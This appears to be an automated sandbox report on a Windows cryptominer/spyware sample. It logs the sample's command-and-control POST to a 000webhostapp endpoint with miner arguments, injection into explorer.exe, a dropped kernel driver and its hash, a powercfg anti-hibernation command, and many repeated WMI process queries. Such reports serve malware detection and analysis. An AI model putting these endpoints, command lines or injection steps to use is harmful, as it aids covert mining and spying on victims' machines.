              Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 484Content-Type: application/jsonHost: pachydermal-deviati.000webhostapp.comUser-Agent: cpp-httplib/0.12.6
              Source: explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
              Source: explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlf
              Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: svchost.exe, 00000005.00000002.4197962632.000001F4E8E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000005.00000002.4198153149.000001F4E8EAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4198579161.000001F4E9070000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4198022550.000001F4E8E2C000.00000004.00000020.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb01u
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E9018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E9018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E9018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E904D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 00000005.00000002.4198153149.000001F4E8EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
              Source: svchost.exe, 00000005.00000002.4198153149.000001F4E8EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYTBmQUFZUHRkSkgtb
              Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php--cinit-version=3.4.0--nicehash--tls--
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.
              Source: explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.exee
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.phpD
              Source: explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pachydermal-deviati.000webhostapp.com/api/endpoint.phprdurxnlmtixfcpxr
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49755 version: TLS 1.2

              System Summary

              barindex
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\gq83mrprwy.exeCode function: 0_2_00007FF7970C1394 NtDeviceIoControlFile,0_2_00007FF7970C1394
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeCode function: 28_2_00007FF74F581394 NtWriteVirtualMemory,28_2_00007FF74F581394
              Source: C:\Windows\System32\conhost.exeCode function: 40_2_0000000140001394 NtQueryAttributesFile,40_2_0000000140001394
              Source: C:\Users\user\Desktop\gq83mrprwy.exeCode function: 0_2_00007FF7970C1394: NtDeviceIoControlFile,0_2_00007FF7970C1394
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeFile created: C:\Windows\TEMP\zadejssjsckf.sysJump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_arojeqlb.yfq.ps1
              Source: C:\Users\user\Desktop\gq83mrprwy.exeCode function: 0_2_00007FF7970C3B500_2_00007FF7970C3B50
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeCode function: 28_2_00007FF74F583B5028_2_00007FF74F583B50
              Source: C:\Windows\System32\conhost.exeCode function: 40_2_000000014000315040_2_0000000140003150
              Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000001400026E040_2_00000001400026E0
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\zadejssjsckf.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeCode function: String function: 00007FF74F581394 appears 33 times
              Source: C:\Users\user\Desktop\gq83mrprwy.exeCode function: String function: 00007FF7970C1394 appears 33 times
              Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@74/18@9/9
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8692:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8332:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8280:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9192:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8524:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uj0bgugp.vym.ps1Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\explorer.exe
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: gq83mrprwy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
